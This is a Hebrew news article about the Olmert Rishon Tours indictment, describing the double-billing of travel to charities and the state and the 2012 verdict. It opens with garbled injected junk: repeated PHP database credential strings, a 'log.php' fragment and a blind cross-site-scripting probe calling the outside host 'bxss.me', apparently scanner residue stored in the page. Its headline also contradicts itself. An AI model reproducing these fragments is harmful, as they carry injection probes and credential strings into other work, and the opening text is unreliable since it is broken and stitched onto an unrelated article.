$db_host = "1"; $db_user = "pHqghUme"; $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> $db_host = "1"; $db_user = "pHqghUme"; $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> $db_host = "1"; $db_user = "pHqghUme"; $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> $db_host = "1"; $db_user = "pHqghUme"; $db_pass = "g00dPa$$w0rD"; $db_name = "1ySf9n9nO"; ?> $db_host = "1" $db_host = "1"; $db_user = "pHqghUme"; $db_pass = "g00dPa$$w0rD"; $db_name = "19342244"; ?> ?>acker-9434/log.php?"; ?>{acx}}%>"; ?> $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> ?> $db_name = "1"; ?>b_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> ?>>'hitvtgywpoinqc09d0.bxss.me')")"; $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> ?> אולמרט זוכה בשני אישומים והורשע בשלישי
x

דיווח על תקלה

תאור תקלה:
שם:
דואר אלקטרוני:
חיפוש באתר
מאמרים אחרונים

כתב אישום והכרעת דין מזכה בשני אישומים וזיכוי בשלישי לאולמרט

תאריך: 31/08/2010 17:49   מחבר: מערכת האתר

אולמרט שולה ורייצ'ל

בתקופה שבין השנים 2002 - 2006, במהלך מילוי תפקידיו כראש העיר ירושלים בקדנציה השנייה, וכממלא מקום ראש הממשלה וכשר המסחר והתעשייה, שר התקשורת וממלא מקום שר האוצר פיתח אולמרט רשת קשרים ענפה עם אישים וארגונים בחו"ל. שימור הקשרים ופיתוחם נעשה בין השאר בדרך של נסיעות מרובות של אולמרט לחו"ל.

שר בממשלת ישראל ואפילו ראש עירייה לא יכול לקום בבוקר ולהחליט שהוא נוסע ליעד כלשהו בחו"ל בלי להכין את הנסיעה, לדווח עליה ועל מטרתה להנהלת משרדו ולראש הממשלה שימנה תחתיו ממלא מקום זמני, לדאוג למקורות מימון לנסיעה ולדווח על תוצאותיה למי שצריך. כל האמור מפורט בנוהלים של נציבות שירות המדינה לעניין נסיעות שרים ועובדי ציבור לחו"ל, הן בתפקיד והן לפי הזמנה של גורמים בחו"ל. 

אולמרט הממלא שורה של תפקידים בשרות הציבורי במשך כ – 40 שנה בקירוב, מודע היטב לכל הנהלים המחייבים. במקרה שלו, הפער בין הידיעה לביצוע בפועל, היה כה גדול והוא זה שהביא לנפילתו ששיאה בהגשת כתב אישום כנגדו ונגד העוזרות שולה זקן ורחל רז ריזבי. הגב' זקן עבדה במשך שנים בכפיפות לאולמרט, וכיהנה בכל המועדים הרלוונטיים לכתב האישום כראש לשכתו. תחילה - בעיריית ירושלים, ולאחר מכן במשרד התמ"ת, עת מילא את תפקידיו כשר במשרדים המפורטים לעיל.

גב' רז ריזבי כיהנה בתפקיד מתאמת קשרי חוץ של אולמרט. תחילה כעובדת עיריית ירושלים ובהמשך כעובדת מדינה במשרדים השונים בהם כיהן אולמרט בתוקף תפקידיו. עצם יצירת תקן מיוחד שנקרא מתאמת קשרי חוץ יש בו כדי להעיד שאולמרט נזקק למתאמת בתקן מלא רק לצורך נסיעותיו המרובות. אילו היה מדובר בנסיעות רגילות שמתוכננות ומתוקצבות לפי הנהלים הברורים, סביר להניח שכל עוזרת של שולה זקן הייתה מסוגל לבצע את העבודה תוך סיוע בקובץ אקסל לא מורכב שמרכז את כל הנתונים הנדרשים. אצל אולמרט, זה היה שוני בתכלית השינוי.

לפי לשון כתב האישום שהוגש נגד רז ריזבי,  "אולמרט והגב' זקן ניצלו את מעמדו ואת קשריו האמורים של מר אולמרט לרעה לפעילות שיטתית, לאורך שנים, של הפקת טובות-הנאה כספיות עבור מר אולמרט. במסגרת זו, מעבר למימון הנסיעות הללו על-חשבון אותם ארגונים, ולעיתים גם מעבר למימון נסיעותיו בתפקידו כשר התמ"ת, בו נשאה המדינה, גרמו השניים בעזרתה של הנאשמת (ריזבי רז), באמצעות מעשי מרמה כלפי הארגונים האמורים וכלפי המדינה, לכך שאותם ארגונים ולעיתים גם המדינה ישאו בהוצאות העולות באורח ניכר על העלויות האמיתיות של אותן נסיעות, כאשר את העודפים הכספיים מפעילותם זו ניצל מר אולמרט למימון הוצאותיו הפרטיות".

זאת ועוד. " הסוואתם של מעשי המרמה של מר אולמרט, הגב' זקן והנאשמת התאפשרה באמצעות תיעוד כוזב שהכינו לבקשתם אנשי משרד הנסיעות, (משרד "ראשונטורס",) ואשר בו נופחו עלויות הנסיעות האמיתיות שביצע מר אולמרט עבור הארגונים ועבור המדינה כדלעיל. זאת על פי חשבוניות וקבלות – לעיתים כפולות ולעיתים כאלה המסלפות את פירטיהם של מסלולי הנסיעות האמיתיים. השניים, בעזרת הנאשמת, דאגו לספק למממנים הללו את התיעוד הכוזב על מנת לבסס בפניהם את ההצדקה כביכול לכיסוי ההוצאות העודפות, ולאפשר להם בכך לכלול אותן ברישומיהם ובדיווחיהם.

על מה בעצם מדובר ? איך עבדה השיטה ? איך יצרו עודפי מימון עבור אולמרט בסך של 92,163 דולר.

אולמרט מתעלם מתוצאות המכרז הממשלתי לרכישת כרטיסי טיסה

על פי נוהל שקבע החשב הכללי במשרד האוצר, רכישת כרטיסי טיסה עבור עובדי מדינה תבוצע אך ורק באמצעות סוכנויות נסיעות שזכו במכרז. בדרך זו ניתן לפקח על מחירי הכרטיסים וגם להבטיח שוויון הזדמנויות בין משרדי הנסיעות המעוניינים לשרת את משרדי הממשלה על פי דיני המכרזים.

במכרז החשכ"ל זכו בין השאר משרדי הנסיעות, "איילה טורס" ו- "הלל". משרד הנסיעות "ראשונטורס", שהשתתף במכרז, לא זכה בו ועל כן לא נכלל ברשימה ולמשרדי הממשלה אסור היה לפנות אליו ולהזמין טיסות באמצעותו. בהתאם להנחיות החשכ"ל ותוצאות המכרז הנחה חשב משרד התמ"ת, דן מרינוב, את עובדי לשכתו של מר אולמרט, להקפיד ולקבל אישור תקציבי לנסיעותיו של השר לחו"ל לפני רכישת כרטיסי הטיסה.

טיסותיו של מר אולמרט מטעם משרד התמ"ת שולמו מתקציב המשרד ומומנו מהסעיף התקציבי שלו העוסק בנסיעות עובדי המשרד בתפקיד לחו"ל. מר אולמרט, הגב' זקן וגב' ריזבי  ידעו כי משרד "ראשונטורס" אינו בין הזוכים במכרז וכי על כן משרד התמ"ת אינו רשאי לרכוש ממנו כרטיסי טיסה עבור נסיעותיו בתפקיד של מר אולמרט.

תוך צפצוף ארוך על החלטות החשכ"ל והנחיות חשב המשרד, החליטו אולמרט וזקן לרכוש כרטיסי טיסה עבור נסיעותיו לחו"ל של אולמרט ומלוויו ממשרד הנסיעות "ראשונטורס". במהלך השנים, נהג מר אולמרט להשתמש בשירותיו של משרד הנסיעות "ראשונטורס" לצורך רכישת כרטיסי הטיסה שלו ושל בני משפחתו לנסיעותיהם לחו"ל. בין מר אולמרט לבין הבעלים של המשרד, עמנואל באומוול שפינר (להלן: "מנק"), נוצרו עם הזמן יחסי אמון.

להיות חבר קרוב של שר בישראל זה לא עניין של מה בכך בייחוד עם מדובר בקשר של גורם עסקי שצפויה לו עדנה עסקית מעצם הקישור למשרד ממשלתי ולשר בישראל שנוסע לחו"ל לעיתים תכופות. מנק, הבעלים של "ראשונטורס", בא לקראת אולמרט ופעל לפי הנחיותיהן של שולה ורחל.

יעדי הנסיעות 
לפי כתב האישום, במהלך התקופה הרלוונטית בה כיהן בתפקידיו הציבוריים בעירייה ובמשרד התמ"ת, נהג מר אולמרט לעיתים תכופות, מתוקף תפקידו ומעמדו, להופיע בחו"ל בפני מוסדות וארגונים העוסקים בפעילות ציבורית שלא למטרת רווח. מרביתם של ארגונים אלה פעילים בתחום הצדקה ובתחום הסיוע לקידום ענייניה של מדינת ישראל והעם היהודי. במסגרת זו, הופיע מר אולמרט בין שאר בפני "אקי"ם", ה"בונדס", "יד ושם", "מרכז שמעון ויזנטל", "מצעד החיים", "הוועד למען החייל", "על"ה", "קרן היסוד", ו"הקונגרס היהודי העולמי".

מר אולמרט השתתף באירועים השונים שהפיקו הארגונים הנ"ל, בין השאר בסעודות (Dinners), בערבי התרמה, בפעילויות הסברה ועוד. בנסיבות אלה נוצר מצב שלעיתים מזומנות, הופיע מר אולמרט במהלך אותה נסיעה לחו"ל בפני מספר ארגונים, באירועים שונים, ולעיתים ההופעות בפני הארגונים התקיימו במסגרת נסיעות בתפקיד והמימון להם ניתן כנהוג, מתקציב המשרד.

במצב שכזה, נוצרה הזדמנות "לעשות קופה" על הדרך ועל חשבון הגורמים המזמינים. זה לא פשוט. נדרשת יצירתיות ומשתפי פעולה להוצאת התוכנית לפועל. משתפי פעולה נאמנים לא היה קשה לאולמרט למצוא.  זקן ריזבי ומנק המתינו לקריאה מתחת לפנס של אולמרט.

השיטות להוצאת כספים במרמה על חשבון המארחים והמדינה

כדי להמחיש, בסיוע כתב האישום את הטכניקות לקבלת כספים במרמה תוך הצגת מצגי שווא,  כמיוחס לאולמרט, זקן וריצבי, נציג שתי דוגמאות מייצגות המעידות על כלל הנסיעות. האחת, הנסיעה הראשונה בתקופת כהונת אולמרט כראש עיריית ירושלים והאחרונה נסיעה לרוסיה וארה"ב בחודש יוני 2005.

נסיעה לבריסל וניו יורק 24.4.02-22.4.02

אולמרט הוזמן להשתתף באירועים של  FIDF (אגודת ידידי צה"ל) ושל הקונגרס היהודי העולמי. לצורך ההשתתפות באירועים הוזמנו כרטיסי טיסה בקו: ת"א – בריסל – פרנקפורט  - ניו יורק – ת"א.

לפי הנוהג שהיה מקובל, מי שרוצה בהשתתפות של אולמרט צריך לשלם. זקן וריזבי ביקשו מהגורמים הרלבנטיים בכל אחד משני הארגונים הנ"ל לשלם בנפרד עבור מסלול טיסה פיקטיבי מבלי שסיפרו למזמינים שאחד מהם או גורם נוסף מימן כבר את הטיסות.

כאשר ביקשו המזמינים לשלוח אליהם את הפירוט של מסלולי הטיסה ומחירי הכרטיסים, כדי לבצע את התשלום המבוקש, פנו זקן וריזבי בידיעת אולמרט למשרד "ראשונטורס" כדי שינפיק קבלות וחשבוניות ובהן פירוט פיקטיבי של מסלולי טיסה, שמר אולמרט כלל לא טס בהם. על החשבוניות והקבלות הודפסו תעריפי טיסה אשר לא תאמו מחירי טיסה אמיתיים אלא מחירים שתואמו מראש עם "ראשונטורס".

לארגונים המזמינים שכה רצו לארח את אולמרט, לא היתה סיבה לחשוד שעובדים עליהם כדי להוציא מהם כספים במרמה. ואכן, עם קבלת המפרט של "ראשונטורס", שילמו את המחיר כמו ילדים טובים ותמימים.

כאשר שני ארגונים ויותר משלמים עבור אותה טיסה שלא הייתה, נוצר לטובת אולמרט עודף מימון כספי. העודף נשמר כמובן בחשבון מיוחד שפתח החבר מנק מ"ראשונטורס".

לפי החישובים של המאשימה ארגון FIDF שילם עבור כרטיס טיסה  למר אולמרט , במסלול ת"א – בריסל – פרנקפורט  - ת"א סכום של 6,689$. הקונגרס היהודי העולמי שילם עבור כרטיס טיסה למר אולמרט , במסלול בריסל – פרנקפורט – ניו יורק – ת"א, סכום של 2,804$. בפועל עלות כרטיסי טיסתו של מר אולמרט, היתה 8,240$. העודף בגובה 1,254$, שהתקבל מארגונים אלה במרמה בעקבות מצגי השווא האמורים, הועבר לטובת חשבונו של מר אולמרט במשרד "ראשונטורס".

נסיעה לארה"ב ורוסיה

בתאריך 30.6.05, נסע מר אולמרט לארה"ב ורוסיה כדי להשתתף באירועים של המדינה וארגון AEI. מסלול נסיעתו של מר אולמרט היה בקו ת"א  - דנוור (דרך ניו יורק)  - רוסיה (דרך פרנקפורט) - ת"א. משרד התמ"ת מימן את כרטיסי הטיסה של מר אולמרט, במסלול מדנוור עד לת"א, בסך כולל של 24,427 ש"ח.

הגב' זקן וריזבי ביקשו מארגון AEI, לשלם עבור מסלול נסיעתו הפיקטיבי של אולמרט תוך שהם מסתירים מהארגון וממשרד התמ"ת את העובדה כי צד נוסף משלם עבור טיסותיו של אולמרט, כך שנוצר שוב עודף מימון בחשבון המיוחד של אולמרט ב"ראשונטורס". אותו משרד ניפק כהרגלו עבור ארגון AEI קבלות וחשבוניות ובהם  מסלולי הטיסה "פיקטיביים" שמר אולמרט כלל לא טס בהם. על החשבוניות והקבלות הללו הופיעו התעריפים שנמסרו לארגונים, אשר לא תאמו מחירי כרטיסי טיסה אמיתיים שהונפקו, אלא "מחירים" שנקבעו, בתיאום אנשי "ראשונטורס". 

בהסתמך על מצגי השווא, מימנה המדינה את מסלול נסיעתו, כמפורט לעיל, וארגון AEI שילם למשרד "ראשונטורס", את הסכום שנתבקש ממנו, מבלי שידע שאולמרט והעוזרות הנאמנות עובדים עליו שוב ובגדול.

לפי החישובים המפורטים בכתב האישום, ארגון AEI שילם עבור כרטיסי טיסה למר אולמרט  ולעליזה אשתו, במסלול ת"א – דנוור - ת"א, 17,619$ עבור מר אולמרט ואשתו עליזה. העלות בפועל של כרטיסי הטיסה של מר אולמרט ועליזה אשתו, שבוצעה דרך משרד "ראשונטורס", היתה 11,341$. העודף, בגובה 6,278$, שהתקבל מהמדינה ומהארגונים במרמה בעקבות מצגי השווא, הועבר לטובת חשבונו של מר אולמרט במשרד "ראשונטורס".

איך נוטרלו המשרדים הזוכים במכרז מכירת כרטיסים ?

במהלך שנת 2003, פנו אולמרט והגב' זקן באמצעות אחרים, למנהלי משרדי הנסיעות "איילה טורס" ו"הלל", שזכו במכרז החשכ"ל כדי שיסכימו לשתף פעולה עם הקומבינה שרקחו עם "ראשונטורס". לפי הנטען בכתב האישום, המשרדים הזוכים ישמשו  "צינור" לקבלת הכספים ממשרד התמ"ת, בעוד שבפועל,  משרד ראשונטורס הוא שימשיך לרכוש את הכרטיסים עבור מר אולמרט. בקשתם נענתה בחיוב.

בהתאם לקומבינה המוסכמת, ולאחר שננצברו חיובים בשיעור של עשרות אלפי דולרים, פנה משרד "איילה טורס" וביקש מחשבות משרד התמ"ת לשלם לו בדיעבד עבור טיסות רבות של מר אולמרט במהלך שנת 2003, למרות שכאמור  הכרטיסים בגינן נרכשו על ידי משרד "ראשונטורס". הבקשה כללה גם את הנתונים הכוזבים האמורים לעיל.

אגף החשב הכללי במשרד האוצר לא ידע כי משרד "איילה טורס" כלל לא היה מעורב ברכישת הכרטיסים, וכי שימש אך "צינור" להעברת כספים למשרד "ראשונטורס". כמו -כן,  חשב משרד התמ"ת לא ידע כי חלק ממסלולי הטיסה ומחירי הכרטיסים שעבורם הוא נדרש לשלם, אינם משקפים את המציאות.

בשלב ראשון, סירב חשב המשרד לשלם עבור הנסיעות הללו, זאת, בנימוק שלא התבקש עבורן מראש אישור תקציבי כנדרש, וכיוון שהנסיעות בוצעו תוך חריגה מתקציב הנסיעות של משרד התמ"ת.
בעקבות סירובו של חשב המשרד ומחאות שהעלה בכתובים, התנהלה חליפת מכתבים בין החשב ובין הגב' זקן. דין ודברים זה הוביל לעירובם של דרגים בכירים יותר באגף החשב הכללי במשרד האוצר, עד שלבסוף, בעקבות המצגים הכוזבים האמורים שהוצגו בפני החשב, אושר התשלום עבור נסיעות מר אולמרט האמורות באופן רטרואקטיבי. 

אנשי החשב הכללי לא היו מודעים לכך שהמדינה משלמת עבור כרטיסים המתארים מסלולי טיסה ומחירים כוזבים. משרד התמ"ת לא ידע כי הוא משלם בפועל, אם כי בעקיפין, ל"ראשונטורס" וכי "איילה טורס" ו"הלל" מהווים אך צינור להעברת הכסף אליו. עוד הוכשלו אנשי החשב הכללי בכך כי משנענו לבסוף לדרישות התשלום שהגיעו אליהם משני משרדי הנסיעות הללו, הם פעלו מבלי ליתן דעתם לכך כי המכרז נעקף וכלליו לא נשמרו. בנסיבות אלה, מצגיהם הכוזבים של מר אולמרט והגב' זקן הובילו לכך כי גם נפגמה האפשרות לפקח על מחירי הכרטיסים ועקרון השוויון בין משרדי הנסיעות לא נשמר.

בעקבות מצגי השווא האמורים, הועבר למשרד "איילה טורס" וממנו למשרד "ראשונטורס", סכום כולל של כ – 70,000$.

אולמרט דואג לרווחת משפחתו

חשבון עודפי המימון נוהל ב"ראשונטורס" החל מחודש אוגוסט 2004 במסגרת כרטיס לקוח שכונה "אולמרט פרטי". אחת למספר חודשים, נהגו מנק ואנשי משרד "ראשונטורס" להגיע לפגישות עם הגב' זקן, ובתקופה מאוחרת יותר עם הגב' זקן וריזבי . בפגישות אלה, נבדק מצב חשבונו של מר אולמרט במשרד "ראשונטורס".

לפי כתב האישום במהלך השנים 2002-2007 "מימן" מר אולמרט, באמצעות חשבונו הפרטי ב"ראשונטורס"  באופן מלא או חלקי,  עשרות טיסות פרטיות שלו ושל בני משפחתו, כמפורט להלן:
טיסות פרטיות של מר אולמרט, של אשתו, של ילדיו ובני זוגם, ושל נכדיו.

טיסות פרטיות של אשתו של מר אולמרט בעת שהצטרפה אליו לנסיעות שמומנו עבורו בלבד על ידי משרד התמ"ת או הארגונים. שדרוג טיסותיו של מר אולמרט מטעם משרד התמ"ת מטיסה במחלקת עסקים (אותה מימן המשרד, כמקובל לגבי נסיעותיהם בתפקיד של שרי הממשלה), לטיסה במחלקה ראשונה, שהמדינה אינה מממנת.  סך הכול, טסו מר אולמרט ובני משפחתו לחו"ל בנסיעות פרטיות, באמצעות משרד "ראשונטורס" בתקופה הנזכרת לעיל, בעלות כוללת של כ- 100,000$ ארה"ב.

אם יוכח בבית המשפט כי הנטען בכתב האישום הוא נכון, אין לנו אלא להתבייש שבחרנו בראש ממשלה חמדן, נהנתן, יהיר שפרץ את גבולות הבושה והחוק. ימים יגידו. נמתין לפסיקת בתי המשפט.

הכרעת הדין

ביום 10 ביולי 2012 הכריע בית המשפט בעניינם של מר אולמרט ושולה זקן. בית המשפט זיכה את אולמרט מחמת הספק בפרשות ראשונטורס ופרשת המעטפות בהקשר של טלנסקי. בנוגע למרכז ההשקעות הורשע במרמה והפרת אמונים לאור מעורבתו בתיקים שניהל מקורבו עורך דין אורי מסר. שולה זקן הורשעה במרמה והפרת אמונים.